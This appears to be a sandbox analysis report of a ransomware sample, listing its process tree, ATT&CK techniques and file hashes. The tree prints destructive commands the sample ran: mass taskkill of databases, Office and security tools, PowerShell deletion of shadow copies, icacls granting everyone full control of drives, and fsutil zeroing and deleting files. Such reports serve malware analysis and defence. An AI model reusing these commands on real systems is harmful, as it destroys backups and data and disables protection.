C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10888
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10904
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10944
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10952
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11016
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11024
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11036
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11064
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11072
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11080
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11092
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11100
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11108
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11124
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:11132
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11140
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11148
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11156
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11172
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11180
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11188
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11528
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11536
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11544
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11560
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11568
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7468
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5132
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11048
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10428
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12296
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12304
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12940
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12948
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12956
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:13508
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13604
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13620
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13636
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵PID:8204
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:216
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:14372
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:8608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe2⤵PID:11620
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:4344
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:14284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵PID:15748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:16664
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 70937d67d5f80f3cbefb81ada24a75da W+kr8+3VE0uWAWI+zXt+Dg.0.1.0.0.01⤵PID:12652
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:13168
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:12572
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d2d6f175889095ed9bb6369514969736
SHA1a0db6ca0e53eafdff0ef356048ba527a9a7956a0
SHA2568247078bc778a5d53b2c529630a5855a7d97c6bf66abae7edbd7c86ed8d5a990
SHA51281bb5501abf09e545fa26b9584c15d36356902da4d122d567f2b082b152077718ccb4d37ea47b5d9450a79b45ff2b8483cf1c5a3674998cffbb607306dd290af
-
Filesize
783B
MD555516337c3aee3c10600d14203927b21
SHA1b252e24d35a6795d8c56ccda1e6b6f0137d48afd
SHA25601f28e6c86bf25bfa0af2a7ab07232392308e450ab4123e4abcc63119d77d901
SHA51260ed7f538e6ab6ad2680ca19a534c3b39889d343d2b63744c225b65aa15dbdb8ebd13e38a12c723bfc8f39af60ba3dd0b1634af224960f6c0055e03d19d50002
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD513efc3cd5f6b8c5ba79ed2a9ac103804
SHA1ce27cda8fd8d2844364a108346be3b2693ddd6a7
SHA256294a13b44a3df4fb2d01dec364014343cb8867965831e421269c956f29f6654e
SHA5127ada899632f947d723e6e817108e2f85bc3ba78d19ee203af807380f373fe00d05cf740d679cd7637442991ce1cc6e7478407c4b501afe7cb892a4596b7e5099